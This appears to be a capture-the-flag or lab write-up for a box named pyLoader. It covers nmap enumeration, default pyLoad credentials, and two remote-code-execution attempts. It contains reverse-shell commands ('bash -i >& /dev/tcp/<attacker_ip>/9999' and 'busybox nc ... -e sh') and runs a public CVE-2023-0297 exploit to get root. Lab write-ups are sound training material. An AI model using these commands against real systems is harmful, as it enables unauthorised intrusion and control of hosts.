pyLoader

pyLoader

‎$ whoami

Enum

sudo nmap -T4 -A -v -o nmap --min-rate 1000 $IP 
sudo nmap -T4 --script=vuln -v -o vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -o alltcp --min-rate 1000 $IP
sudo nmap -T4 -sU -sV -sC -v -p -o udp --min-rate 1000 $IP
sudo nmap -A -v -p- -o alltcpslow $IP

Services:

ssh 22
pyload 9666

Default creds on pyload worked:

pyload:pyload
image

Found these:

GitHub Download to arbitrary folder can lead to RCEGitHub Download to arbitrary folder can lead to RCE PyLoad 0.5.0 Remote Code Execution ≈ Packet StormPyLoad 0.5.0 Remote Code Execution ≈ Packet Storm

Trying the first one

echo -e '#!/bin/bash\nbash -i >& /dev/tcp/<attacker_ip>/9999 0>&1' > evil.sh&1
sudo python3 -m http.server 80
nc -lvnp 9999

On pyLoad

Change pyLoad file permission settings

Change permissions of downloads: On
Permission mode for downloaded files: 0744

Create a package with link pointing to the attacker

http://<attacker_ip>/evil.sh

Edit package and change folder to /config/scripts/package_deleted/

Refresh package. Wait up to 60 seconds for scripts to be processed by pyLoad

Delete any package package to trigger the script
image
image
image

This did not work, back to other rce

GitHub GitHub - JacobEbben/CVE-2023-0297: Unauthenticated Remote Code Execution in PyLoad <0.5.0b3.dev31GitHub GitHub - JacobEbben/CVE-2023-0297: Unauthenticated Remote Code Execution in PyLoad <0.5.0b3.dev31

image

Confirmed valid, now lets get shell

python3 exploit.py -t http://192.168.245.26:9666 -c 'busybox nc 192.168.45.171 4444 -e sh'

instant root.

proof.txt

b873d3335d7831c4e91fb12e6a9196eb